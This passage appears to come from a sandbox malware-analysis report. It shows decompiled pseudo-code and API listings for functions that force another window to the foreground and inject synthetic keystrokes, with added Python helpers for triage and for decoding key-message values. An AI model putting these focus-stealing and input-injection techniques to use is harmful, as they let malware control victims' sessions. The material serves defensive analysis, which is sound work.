                                          						_t66 = _t82 & 0x0000ffff;
                                          					}
                                          					 *0xc95914 = r14d;
                                          				} else {
                                          					_t66 =  *0xc958fc & 0x0000ffff;
                                          				}
                                          				return _t66;
                                          			}

                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,000001F4,00000000,?,?,00C7D620), ref: 00C82BE9
                                          • GetTickCount.KERNEL32 ref: 00C82C06
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,000001F4,00000000,?,?,00C7D620), ref: 00C82C2D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$CountEnterLeaveTick
                                          • String ID:
                                          • API String ID: 1056156058-0
                                          • Opcode ID: c9207bd5d471b2d5ba5cf15d52233398a328010f6bfbbce1402242223c7c10cb
                                          • Instruction ID: 04e71abd7509acfe12d3387db0ef5e6591d0c606d57450d5646cbc609298740f
                                          • Opcode Fuzzy Hash: c9207bd5d471b2d5ba5cf15d52233398a328010f6bfbbce1402242223c7c10cb
                                          • Instruction Fuzzy Hash: 98717C31251F54C9FB12EF65E848BA833B4F748B99F840226E94D53BA0DF38C65AC748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E00C7C170(void* __eflags, unsigned int __rax, long long __rbx, void* __rcx, unsigned long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long _a8, long long _a16, long long _a24, long long _a32) {
                                          				intOrPtr _v40;
                                          				intOrPtr _v48;
                                          				intOrPtr _v56;
                                          				int _t21;
                                          				long _t22;
                                          				long _t41;
                                          				unsigned long long _t56;
                                          				unsigned long long _t58;
                                          				void* _t83;
                                          				unsigned long long _t87;
                                          				void* _t93;
                                          
                                          				_t93 = __r9;
                                          				_t60 = __rcx;
                                          				_a16 = __rbx;
                                          				_a24 = __rbp;
                                          				_a32 = __rsi;
                                          				_t4 = _t60 + 0x88; // 0x88
                                          				_t94 = _t4;
                                          				_t83 = __rcx;
                                          				_t58 = __rdx;
                                          				_t21 = E00C7C050(__rax, __rdx, _t4, __rdx, __rcx);
                                          				r15d = 0;
                                          				if(_t21 != 0) {
                                          					_a8 = r15d;
                                          					_t41 = r15d;
                                          					__imp__GetWindowLongPtrA();
                                          					_t56 = __rax >> 0x1e;
                                          					if((_t21 & 0x00000001) != 0) {
                                          						GetAncestor();
                                          						_t58 = _t56;
                                          					}
                                          					_t21 = E00C7F480(_t58, _t83);
                                          					_t87 = _t56;
                                          					if(_t56 != _t58) {
                                          						_t21 = E00C7B764(_t56, _t58, _t58);
                                          						if(_t21 != 0) {
                                          							_t21 = E00C7BB64(_t56, _t58, _t94, _t58, _t93);
                                          							_t48 = _t21 & 0x00000015;
                                          							if((_t21 & 0x00000015) == 0) {
                                          								_t22 = GetWindowThreadProcessId();
                                          								r9d = r15w & 0xffffffff;
                                          								_v56 = 1;
                                          								_t92 = _t58;
                                          								E00C78CFC(_t22, _t48, _t56, _t58, _t83, _t87, _t58);
                                          								if(_t87 != 0) {
                                          									_t41 = GetWindowThreadProcessId();
                                          								}
                                          								GetCurrentThreadId();
                                          								if(_t41 != 0) {
                                          									r8d = 1;
                                          									AttachThreadInput(??, ??, ??);
                                          								}
                                          								BringWindowToTop();
                                          								SetForegroundWindow(??);
                                          								SetActiveWindow(??);
                                          								_t21 = SetFocus(??);
                                          								if(_t41 != 0) {
                                          									r8d = 0;
                                          									_t21 = AttachThreadInput(??, ??, ??);
                                          								}
                                          								if( *((intOrPtr*)(_t83 + 0x1dc)) != r15d) {
                                          									_v40 = 3;
                                          									r9d = 0;
                                          									_v48 = r15d;
                                          									r8d = 0;
                                          									_v56 = r15d;
                                          									SetWindowPos(??, ??, ??, ??, ??, ??, ??);
                                          									r8d = 1;
                                          									_t21 = E00C82424(0, _t56, _t58, _t83, _t58, _t83, _t87, _t92, _t93);
                                          									E00C7F4BC();
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t21;
                                          			}

                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • GetWindowLongPtrA.USER32 ref: 00C7C1B7
                                          • GetAncestor.USER32 ref: 00C7C1CC
                                          • GetWindowThreadProcessId.USER32 ref: 00C7C211
                                          • GetWindowThreadProcessId.USER32 ref: 00C7C23D
                                          • GetCurrentThreadId.KERNEL32 ref: 00C7C245
                                          • AttachThreadInput.USER32 ref: 00C7C25B
                                          • BringWindowToTop.USER32 ref: 00C7C264
                                          • SetForegroundWindow.USER32 ref: 00C7C26D
                                          • SetActiveWindow.USER32 ref: 00C7C276
                                          • SetFocus.USER32 ref: 00C7C27F
                                          • AttachThreadInput.USER32 ref: 00C7C290
                                          • SetWindowPos.USER32 ref: 00C7C2BC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Thread$AncestorAttachInputProcess$ActiveBringCurrentFocusForegroundLong
                                          • String ID:
                                          • API String ID: 371883717-0
                                          • Opcode ID: 10649c7a0e31fef9d2295e9d769231f318eda589397cbca78c3a5e95fd14270a
                                          • Instruction ID: ed59abd83f230f79998db8972808043d64a4d13d9546d4e9e01910352be69200
                                          • Opcode Fuzzy Hash: 10649c7a0e31fef9d2295e9d769231f318eda589397cbca78c3a5e95fd14270a
                                          • Instruction Fuzzy Hash: C731707534474187EA24AF26B854B6A63A1F789FC0F888538EE5A47B1ADF3CC5468704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
                                          • HeapAlloc.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A555
                                          • GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A56D
                                          • GetLongPathNameW.KERNEL32 ref: 00C7A592
                                          • lstrcatW.KERNEL32 ref: 00C7A5B2
                                          • lstrcatW.KERNEL32 ref: 00C7A623
                                          • lstrcatW.KERNEL32 ref: 00C7A638
                                          • lstrcatW.KERNEL32 ref: 00C7A644
                                          • HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: lstrcat$Path$HeapTemp$AllocErrorFreeLastLongName
                                          • String ID:
                                          • API String ID: 1976455836-0
                                          • Opcode ID: ddae719c9a5d7962ce315601e1fdb482d6a7b000abb518de9e8f0829f40fc914
                                          • Instruction ID: ec059921d5aaef19e0b696885390f8361704f74784bcb2c05018b303a40e54f5
                                          • Opcode Fuzzy Hash: ddae719c9a5d7962ce315601e1fdb482d6a7b000abb518de9e8f0829f40fc914
                                          • Instruction Fuzzy Hash: 8F418F72301B4186EB249F22AC54B696365BB88FE4F48C325ED2E43BA8DF38C5598705
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00C63778), ref: 00C779A9
                                          • StrRChrW.SHLWAPI(?,?,?,00C63778), ref: 00C779BB
                                          • HeapAlloc.KERNEL32(?,?,?,00C63778), ref: 00C77A10
                                          • SetLastError.KERNEL32(?,?,?,00C63778), ref: 00C77A21
                                          • memcpy.NTDLL(?,?,?,00C63778), ref: 00C77A3B
                                          • wsprintfW.USER32 ref: 00C77A4E
                                          • lstrcmpiW.KERNEL32(?,?,?,00C63778), ref: 00C77A61
                                          • lstrcatW.KERNEL32 ref: 00C77A75
                                          • lstrcatW.KERNEL32 ref: 00C77A81
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: lstrcat$AllocErrorHeapLastlstrcmpilstrlenmemcpywsprintf
                                          • String ID: Default
                                          • API String ID: 623154198-753088835
                                          • Opcode ID: fd863ade63e4c1d0fb5bbe1878f995c75349ce149d4469463f37fac87902852a
                                          • Instruction ID: d948d89bef76392ac528953d62802ce42c389ccec5571595133bc2bec534382e
                                          • Opcode Fuzzy Hash: fd863ade63e4c1d0fb5bbe1878f995c75349ce149d4469463f37fac87902852a
                                          • Instruction Fuzzy Hash: 34318E65304B8585FA24DB13ED44BA96761AB88FE0F88D225DD1E47B24EE3CC645C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,00C77052), ref: 00C770D5
                                          • GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,00C77052), ref: 00C770E5
                                          • GetLastError.KERNEL32 ref: 00C770F2
                                          • HeapAlloc.KERNEL32 ref: 00C77112
                                          • GetEnvironmentVariableW.KERNEL32 ref: 00C7712E
                                          • lstrcatW.KERNEL32 ref: 00C77143
                                          • lstrcatW.KERNEL32 ref: 00C77153
                                          • GetLastError.KERNEL32 ref: 00C7716B
                                          • HeapFree.KERNEL32 ref: 00C7717F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: EnvironmentErrorHeapLastVariablelstrcat$AllocFreelstrlen
                                          • String ID: \Opera
                                          • API String ID: 3093186349-313673050
                                          • Opcode ID: 554bb047b9f55351cd3b17b0eb4ed385cd75424c7a8c42595613cf445ea150c1
                                          • Instruction ID: 211e6fd809844ffa832c3bce0d69ee43db9a62a4100ab0cdc91feb9b262bed06
                                          • Opcode Fuzzy Hash: 554bb047b9f55351cd3b17b0eb4ed385cd75424c7a8c42595613cf445ea150c1
                                          • Instruction Fuzzy Hash: CB21C331304B5586FB14DF67AD54B2A63A1BB89FE0F88C220DD0A43F25DF38C84A8704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: DirectorySystemWindows$AllocErrorHeapLastlstrcatmemset
                                          • String ID: \explorer.exe$h
                                          • API String ID: 908777495-2845133803
                                          • Opcode ID: b9e6b49cb317998a65c80cfb4e8d24276eb097ca682b7a4754b78e285afaddb2
                                          • Instruction ID: 8988325d7f48527f997d65efbb18751520a361616bcfb0a0601f2333bfcf3e95
                                          • Opcode Fuzzy Hash: b9e6b49cb317998a65c80cfb4e8d24276eb097ca682b7a4754b78e285afaddb2
                                          • Instruction Fuzzy Hash: 80318E36304B85C6E720DF26E89475A77A5F788B94F548226EB8E43B64DF38D809C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%
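The listings above describe each function of the dumped module only by the imports it calls and the string it references, so the reader has to recognise the behaviour from the API combination: AttachThreadInput paired with SetForegroundWindow/BringWindowToTop/SetFocus is the standard way to force a window to the foreground from another thread, and GetTempPathW or GetEnvironmentVariableW followed by lstrcatW is path building. The Python below is an editor-added triage helper, not part of the Joe Sandbox report or of the sample: it parses listings in exactly this format, groups the calls per function (keeping "Part of subcall function" entries separate), and tags each function with behaviour labels chosen by the editor. The labels, the signature sets and the abridged sample input (copied from three of the listings above) are the editor's assumptions, not sandbox verdicts.

```python
"""Editor-added triage helper for Joe Sandbox per-function "APIs" listings.

Not part of the report or the sample. It parses bullet lines of the form
"• Name.MODULE(args), ref: ADDR" (and the "Part of subcall function" variant),
groups them per function, and tags each function with coarse behaviour
heuristics chosen by the editor. The labels are assumptions about what the
API combinations usually mean, not sandbox verdicts.
"""
import re

_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\([^)]*\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")
_APIID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<s>.*)$")

# Editor's heuristics: (all of these, at least one of these, label).
SIGNATURES = [
    ({"AttachThreadInput", "SetForegroundWindow"},
     {"BringWindowToTop", "SetFocus", "SetActiveWindow", "SetWindowPos"},
     "forced-foreground (AttachThreadInput focus steal)"),
    ({"GetTempPathW"}, {"lstrcatW", "GetLongPathNameW"},
     "builds a path under %TEMP%"),
    ({"GetEnvironmentVariableW"}, {"lstrcatW"},
     "builds a path from an environment variable"),
]


def parse_api_blocks(text):
    """Split the listing into one record per "APIs" section."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "subcall_apis": [], "strings": [], "api_id": ""}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            # Calls reached through a callee are kept but recorded separately.
            bucket = cur["subcall_apis"] if m.group("callee") else cur["apis"]
            bucket.append((m.group("name"), m.group("module"), m.group("ref")))
            continue
        m = _STRING_RE.match(line)
        if m:
            # "$" separates multiple strings in the report's String ID field.
            cur["strings"] = [s for s in m.group("s").split("$") if s]
            continue
        m = _APIID_RE.match(line)
        if m:
            cur["api_id"] = m.group("s").strip()
    return blocks


def tag_block(block):
    """Apply SIGNATURES to the union of direct and subcall API names."""
    names = {n for n, _, _ in block["apis"]} | {n for n, _, _ in block["subcall_apis"]}
    return [label for need, any_of, label in SIGNATURES
            if need <= names and names & any_of]


def triage(text):
    """Return one summary dict per function, in listing order."""
    return [{"api_id": b["api_id"],
             "direct_apis": [n for n, _, _ in b["apis"]],
             "strings": b["strings"],
             "tags": tag_block(b)} for b in parse_api_blocks(text)]


# Sample input: three of the listings from this report, abridged by the editor.
SAMPLE = r"""
APIs
  • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
  • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
  • GetWindowLongPtrA.USER32 ref: 00C7C1B7
  • GetWindowThreadProcessId.USER32 ref: 00C7C211
  • GetCurrentThreadId.KERNEL32 ref: 00C7C245
  • AttachThreadInput.USER32 ref: 00C7C25B
  • BringWindowToTop.USER32 ref: 00C7C264
  • SetForegroundWindow.USER32 ref: 00C7C26D
  • SetActiveWindow.USER32 ref: 00C7C276
  • SetFocus.USER32 ref: 00C7C27F
  • AttachThreadInput.USER32 ref: 00C7C290
  • SetWindowPos.USER32 ref: 00C7C2BC
Similarity
  • API ID: Window$Thread$AncestorAttachInputProcess$ActiveBringCurrentFocusForegroundLong
  • String ID:
APIs
  • GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
  • GetLongPathNameW.KERNEL32 ref: 00C7A592
  • lstrcatW.KERNEL32 ref: 00C7A5B2
  • HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661
Similarity
  • API ID: lstrcat$Path$HeapTemp$AllocErrorFreeLastLongName
  • String ID:
APIs
  • GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,00C77052), ref: 00C770E5
  • lstrcatW.KERNEL32 ref: 00C77143
Similarity
  • API ID: EnvironmentErrorHeapLastVariablelstrcat$AllocFreelstrlen
  • String ID: \Opera
"""

if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry["direct_apis"][0], entry["strings"], entry["tags"])
```

Feed it the text of a whole report page and the "forced-foreground" tag picks out the focus-stealing function on the first pass; the subcall entries are counted towards the signature because the behaviour is the same whether the call sits in the function or in its callee.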

                                          C-Code - Quality: 33%
                                          			E00C81508(long long __rbx, void* __rcx, intOrPtr* __rdx, void* __r8, signed long long __r9) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				long _t92;
                                          				signed int _t100;
                                          				signed short _t103;
                                          				signed short _t110;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				long _t117;
                                          				signed int _t128;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				intOrPtr _t188;
                                          				void* _t194;
                                          				signed long long _t198;
                                          				intOrPtr _t201;
                                          				signed long long _t215;
                                          				intOrPtr* _t216;
                                          				void* _t220;
                                          				signed long long _t222;
                                          				signed long long _t224;
                                          				void* _t227;
                                          				signed long long _t229;
                                          				signed long long _t230;
                                          				void* _t231;
                                          				void* _t233;
                                          				signed long long _t236;
                                          				intOrPtr* _t243;
                                          				signed long long _t245;
                                          				signed long long _t246;
                                          				signed long long _t248;
                                          
                                          				_t236 = __r9;
                                          				_t233 = __r8;
                                          				_t217 = __rdx;
                                          				_t187 = _t230;
                                          				 *((long long*)(_t187 + 8)) = __rbx;
                                          				 *((long long*)(_t187 + 0x10)) = __rdx;
                                          				_push(_t227);
                                          				_push(_t222);
                                          				_push(_t220);
                                          				_push(_t246);
                                          				_push(_t248);
                                          				_t231 = _t230 - 0x60;
                                          				r15d = 0;
                                          				_t194 = __rcx;
                                          				 *((intOrPtr*)(_t187 + 0x20)) = r15w;
                                          				r14d = r9d;
                                          				_t146 = r8d;
                                          				_t243 = __rdx;
                                          				_t145 = r15d;
                                          				asm("dec eax");
                                          				_t224 =  !_t222 & 0xc0000000;
                                          				_t92 = E00C7BEC4();
                                          				 *(_t231 + 0x40) = _t92;
                                          				_t198 = 0xc95500;
                                          				_t128 = r15d;
                                          				while( *_t198 != _t146) {
                                          					_t128 = _t128 + 1;
                                          					_t198 = _t198 + 4;
                                          					if(_t128 < 3) {
                                          						continue;
                                          					}
                                          					if(_t227 - 0x20 <= 0x5e || _t227 - 0xa0 <= 0x5f) {
                                          						L11:
                                          						r12d = E00C813A4(_t146, _t128, _t194, _t198, _t233, _t236) & 0x0000ffff;
                                          						_t117 = GetWindowThreadProcessId(??, ??);
                                          						GetKeyboardLayout(??);
                                          						_t15 = _t231 + 0xb8; // 0xff70
                                          						_t234 = _t15;
                                          						 *(_t231 + 0x48) = _t187;
                                          						E00C81158(r12w & 0xffffffff, _t194, _t187, _t224, _t227, _t15);
                                          						 *(_t231 + 0x50) = _t187;
                                          						_t229 = _t187;
                                          						if(_t145 != 0) {
                                          							L38:
                                          							if(r14d != 0) {
                                          								r8d = r14d;
                                          								E00C81978(_t117, _t145, _t187, _t194, _t217);
                                          							}
                                          							 *(_t231 + 0xb8) = MapVirtualKeyA() & 0x000000ff;
                                          							_t188 =  *((intOrPtr*)(_t194 + 0x38));
                                          							if( *((intOrPtr*)(_t188 + 0x1e)) >= r15b ||  *((intOrPtr*)(_t188 + 0x1d)) < r15b) {
                                          							}
                                          							if(r14d == 0) {
                                          								 *(_t194 + 0x280) = r15d;
                                          							} else {
                                          								 *(_t194 + 0x280) = 1;
                                          							}
                                          							if(r14d == 0) {
                                          								r8d = 0;
                                          								E00C81978(0xff, _t145, _t188, _t194, _t217);
                                          							}
                                          							_t201 =  *((intOrPtr*)(_t194 + 0x38));
                                          							r14d = 0x20000000;
                                          							_t187 =  >=  ? _t224 : _t224 | _t246;
                                          							_t224 =  >=  ? _t224 : _t224 | _t246;
                                          							if(_t145 >= 0xa0) {
                                          								if(_t145 <= 0xa1) {
                                          									_t145 = 0x10;
                                          								} else {
                                          									_t64 = _t220 - 0xa4; // -164
                                          									if(_t64 <= 1) {
                                          										_t145 = 0x12;
                                          									}
                                          								}
                                          							}
                                          							r15d = _t145;
                                          							_t100 = 0;
                                          							L54:
                                          							if( *((intOrPtr*)(_t201 + 0x164)) != _t100) {
                                          								_t103 = VkKeyScanExW();
                                          								_t234 =  *(_t231 + 0x48);
                                          								if(E00C81050(_t103 & 0x0000ffff, r12w & 0xffffffff, _t187, _t194, _t229,  *(_t231 + 0x48)) == 0) {
                                          									_t236 =  *(_t231 + 0x50);
                                          									if(_t236 != 0) {
                                          										_t70 = _t231 + 0x50; // 0xff08
                                          										 *((long long*)(_t231 + 0x30)) = _t70;
                                          										r8d = 6;
                                          										 *((intOrPtr*)(_t231 + 0x28)) = 0x3e8;
                                          										 *((intOrPtr*)(_t231 + 0x20)) = 2;
                                          										SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          									}
                                          								}
                                          							}
                                          							_t92 = E00C81324(_t145, _t194, _t234);
                                          							if(_t92 != 0) {
                                          								break;
                                          							} else {
                                          								if( *(_t194 + 0x278) == _t92) {
                                          									_t92 = E00C81264(_t145, _t194, _t194, _t220, _t234);
                                          								}
                                          								if( *(_t194 + 0x278) != 0) {
                                          									L66:
                                          									 *(_t194 + 0x278) =  *(_t194 + 0x278) & 0x00000000;
                                          									break;
                                          								} else {
                                          									if(_t92 == 0) {
                                          										L65:
                                          										_t80 = _t231 + 0x50; // 0xff08
                                          										 *((long long*)(_t231 + 0x30)) = _t80;
                                          										r9d = 0;
                                          										 *((intOrPtr*)(_t231 + 0x28)) = 0x3e8;
                                          										 *((intOrPtr*)(_t231 + 0x20)) = 2;
                                          										_t85 = _t236 + 3; // 0x3
                                          										r8d = _t85;
                                          										SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          										r9d =  *(_t231 + 0xb8) & 0x0000ffff;
                                          										_t92 = PostMessageA(??, ??, ??, ??);
                                          										goto L66;
                                          									}
                                          									_t92 = GetTickCount();
                                          									if(_t92 -  *(_t194 + 0x288) < 0x1f4) {
                                          										goto L66;
                                          									}
                                          									 *(_t194 + 0x288) = _t92;
                                          									E00C81124(_t194, _t243, _t236);
                                          									goto L65;
                                          								}
                                          							}
                                          						}
                                          						_t217 = _t243;
                                          						if(E00C81124(_t194, _t243, _t236) == 0) {
                                          							L17:
                                          							_t92 =  *(_t194 + 0x280);
                                          							if(_t92 != 0) {
                                          								L20:
                                          								_t187 =  *((intOrPtr*)(_t194 + 0x38));
                                          								if( *((intOrPtr*)(_t187 + 0x1c)) >= r15b ||  *((intOrPtr*)(_t187 + 0x1e)) != r15b ||  *((intOrPtr*)(_t187 + 0x1d)) != r15b) {
                                          									L32:
                                          									r15d =  *(_t231 + 0xb8) & 0x0000ffff;
                                          									_t110 = MapVirtualKeyA(??, ??);
                                          									_t201 =  *((intOrPtr*)(_t194 + 0x38));
                                          									 *(_t231 + 0xb8) = _t110 & 0x000000ff;
                                          									_t100 = 0;
                                          									if( *((intOrPtr*)(_t201 + 0x1e)) >= 0 ||  *((intOrPtr*)(_t201 + 0x1d)) < 0) {
                                          									}
                                          									if(r14d == 0) {
                                          										 *(_t194 + 0x284) = _t100;
                                          									} else {
                                          										 *(_t194 + 0x284) = 1;
                                          									}
                                          									goto L54;
                                          								} else {
                                          									L23:
                                          									if(r14d == 0 || r12w == 0) {
                                          										break;
                                          									} else {
                                          										_t187 =  *((intOrPtr*)(_t194 + 0x38));
                                          										r14d = 0x20000000;
                                          										r15d = r12w & 0xffffffff;
                                          										_t215 =  >=  ? _t224 : _t224 | _t246;
                                          										_t224 = _t215;
                                          										_t245 = _t215;
                                          										_t112 = MapVirtualKeyA(??, ??);
                                          										_t100 = 0;
                                          										_t201 =  *((intOrPtr*)(_t194 + 0x38));
                                          										 *(_t231 + 0xb8) = _t112 & 0x000000ff;
                                          										if( *((intOrPtr*)(_t201 + 0x1e)) >= 0 ||  *((intOrPtr*)(_t201 + 0x1d)) < 0) {
                                          										}
                                          										if( *(_t231 + 0x40) != _t100) {
                                          											 *(_t194 + 0x280) = 1;
                                          											_t248 = _t187;
                                          											_t224 =  >=  ? _t245 : _t224 | _t246;
                                          										}
                                          										_t243 =  *((intOrPtr*)(_t231 + 0xa8));
                                          										goto L54;
                                          									}
                                          								}
                                          							}
                                          							if( *(_t194 + 0x284) == r15d) {
                                          								goto L23;
                                          							}
                                          							if(_t92 == 0) {
                                          								goto L32;
                                          							}
                                          							goto L20;
                                          						}
                                          						if(_t229 == 0) {
                                          							_t117 = r12b;
                                          							_t145 = VkKeyScanExA(??, ??) & 0x000000ff;
                                          						} else {
                                          							_t145 =  *(_t231 + 0xb8) & 0x000000ff;
                                          						}
                                          						if(_t145 != 0) {
                                          							goto L38;
                                          						} else {
                                          							goto L17;
                                          						}
                                          					} else {
                                          						_t217 = 0xc94450;
                                          						_t115 = r15d;
                                          						_t216 = 0xc94450;
                                          						L6:
                                          						L6:
                                          						if( *_t216 == _t146) {
                                          							_t198 = _t187 + _t187 * 2;
                                          							_t145 =  *(_t217 + 4 + _t198 * 4) & 0x000000ff;
                                          							if( *((intOrPtr*)(_t217 + 8 + _t198 * 4)) != r15d) {
                                          								asm("dec eax");
                                          							}
                                          						} else {
                                          							goto L7;
                                          						}
                                          						goto L11;
                                          						L7:
                                          						_t115 = _t115 + 1;
                                          						_t216 = _t216 + 0xc;
                                          						if(_t115 < 0x61) {
                                          							goto L6;
                                          						} else {
                                          							goto L11;
                                          						}
                                          					}
                                          				}
                                          				return _t92;
                                          			}
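The decompiled function above translates characters with VkKeyScanExW/MapVirtualKeyA and delivers them to a window with SendMessageTimeoutA and PostMessageA; the magic numbers it uses are documented Windows values and can be read off the listing: 0xA0..0xA1 collapse to VK_SHIFT (0x10) and 0xA4..0xA5 to VK_MENU (0x12), 0x20000000 loaded into r14d is bit 29 of a key-message lParam (the ALT context code), the MapVirtualKeyA result is masked to 8 bits as the scan code, the flags value 2 passed to SendMessageTimeoutA is SMTO_ABORTIFHUNG with a 0x3E8 (1000 ms) timeout, and 0x1F4 (500 ms) is the GetTickCount throttle before a re-send. The Python below is an editor-added example, not code from the sample: it reproduces that arithmetic so an analyst can check the values. The WM_KEYDOWN/WM_KEYUP pair and the scan-code inputs are assumptions made for the example; the listing shows the message arguments unresolved.

```python
"""Editor-added example, not code from the sample: the key-message arithmetic
visible in E00C81508, written out with the documented winuser.h values."""

VK_SHIFT, VK_MENU = 0x10, 0x12            # generic modifier VKs
VK_LSHIFT, VK_RSHIFT = 0xA0, 0xA1         # left/right shift
VK_LMENU, VK_RMENU = 0xA4, 0xA5           # left/right alt
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101     # assumed message pair (not resolved in the listing)
SMTO_ABORTIFHUNG = 0x0002                 # the "2" stored as fuFlags before SendMessageTimeoutA
SEND_TIMEOUT_MS = 0x3E8                   # the 1000 ms uTimeout in the listing
RESEND_THROTTLE_MS = 0x1F4                # GetTickCount delta compared before re-sending
CONTEXT_CODE_ALT = 0x20000000             # lParam bit 29, the value loaded into r14d


def normalize_modifier(vk: int) -> int:
    """Collapse left/right modifier codes to the generic VK, as the listing does
    for 0xA0..0xA1 -> 0x10 and 0xA4..0xA5 -> 0x12 (other codes pass through)."""
    if VK_LSHIFT <= vk <= VK_RSHIFT:
        return VK_SHIFT
    if VK_LMENU <= vk <= VK_RMENU:
        return VK_MENU
    return vk


def build_key_lparam(scan_code: int, *, alt: bool = False, key_up: bool = False,
                     extended: bool = False, repeat: int = 1) -> int:
    """Pack the documented WM_KEYDOWN/WM_KEYUP lParam layout:
    bits 0-15 repeat count, 16-23 scan code, 24 extended-key flag,
    29 context code (ALT held), 30 previous key state, 31 transition state."""
    lp = repeat & 0xFFFF
    lp |= (scan_code & 0xFF) << 16        # the listing stores MapVirtualKeyA(...) & 0xFF
    if extended:
        lp |= 1 << 24
    if alt:
        lp |= CONTEXT_CODE_ALT
    if key_up:
        lp |= (1 << 30) | (1 << 31)       # previous state down, transition up
    return lp & 0xFFFFFFFF


def decode_key_lparam(lp: int) -> dict:
    """Inverse of build_key_lparam, for reading values seen in a trace."""
    return {
        "repeat": lp & 0xFFFF,
        "scan_code": (lp >> 16) & 0xFF,
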